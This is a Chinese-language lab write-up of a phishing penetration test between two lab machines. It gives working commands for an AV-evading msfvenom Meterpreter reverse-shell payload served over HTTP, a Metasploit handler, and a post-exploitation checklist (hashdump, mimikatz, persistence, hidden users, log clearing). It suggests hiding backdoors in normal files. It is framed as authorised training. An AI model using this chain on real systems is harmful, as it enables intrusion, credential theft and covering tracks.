钓鱼渗透测试实验复现 钓鱼渗透测试实验复现用途网络安全学习分享仅限授权环境测试一、实验环境角色系统/工具IP地址攻击机Windows 11矛盾武器库10.0.0.166靶机Windows 10 x6410.0.0.153攻击机Windows 11 Penetration Suite Toolkit - VMware Workstation矛盾武器库可以去下载靶机普通win10 X64二、实验原理本次实验采用「后门植入 反向连接」的经典渗透链路MSFvenom生成带有反向 Shell 的 Payload可执行文件。攻击机开启 HTTP 服务供靶机下载 Payload。MSFconsole Handler在攻击机监听指定端口等待靶机上线。靶机执行 Payload后Meterpreter 会话建立进入后渗透阶段。三、实验步骤关闭靶机防火墙互相ping网段测试链接靶机ping攻击机攻击机ping靶机生成payload攻击机使用MSF矛盾武器库自带无需额外下载分为MSFvenom和MSFconsolemsfvenom 生成 payloadmsfconsole 多模块后续操作先用msfvenom生成payload在桌面msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.0.0.166 LPORT4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe然后新开一个窗口打开攻击机的8080端口让靶机能够正常访问netsh advfirewall firewall add rule nameHTTP_8080 dirin actionallow protocoltcp localport8080还有4444端口后面也会用到netsh advfirewall firewall add rule nameMSF_4444 dirin actionallow protocoltcp localport4444在桌面开启http服务python3 -m http.server 8080打开MSFconsole命令行输入banner查看信息和各模块数量exploit漏洞攻击/利用模块auxiliary辅助模块信息收集、扫描、嗅探、指纹识别、口令猜解post后渗透模块获取目标系统的控制权以后进行的一系列攻击动作比如获取敏感信息、跳板攻击等paylods攻击代码或指令encoders加密模块对payload进行加密躲避杀毒软件的查杀nops提高和维持payload稳定性evasion高级免杀使用模块use exploit/multi/handler输入show options查看信息以下是配置信息set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.0.0.166set LPORT 4444run正在监听然后我们切换到靶机来访问攻击机地址并下载shell.exe会被实时监测查杀我们做实验环境简单教学为主关闭实时保护现在下载下来执行文件返回攻击机可以发现已经成功连接靶机然后进输入shell可以运用靶机的shell窗口输入whoami发现我们是管理员账户实验环境靶机登陆的就是管理员现在截张靶机图片成功拿下关闭攻击机实验开放窗口netsh advfirewall firewall delete rule nameHTTP_8080netsh advfirewall firewall delete rule nameMSF_4444结尾正常渗透后应该是普通用户先进行信息搜集再提升权限凭证获取权限维持横向移动做完清理痕迹不做演示。信息搜集sysinfo、getuid、ps、ipconfig、route权限提升getsystem、local_exploit_suggester凭证获取hashdump、kiwi/mimikatz明文密码权限维持persistence、注册表后门、添加隐藏用户横向移动route add socks_proxy 跳板进内网痕迹清理clearev、删除后门账户与文件万变不离其宗钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用方法多样自行发挥。以上仅作学习分享。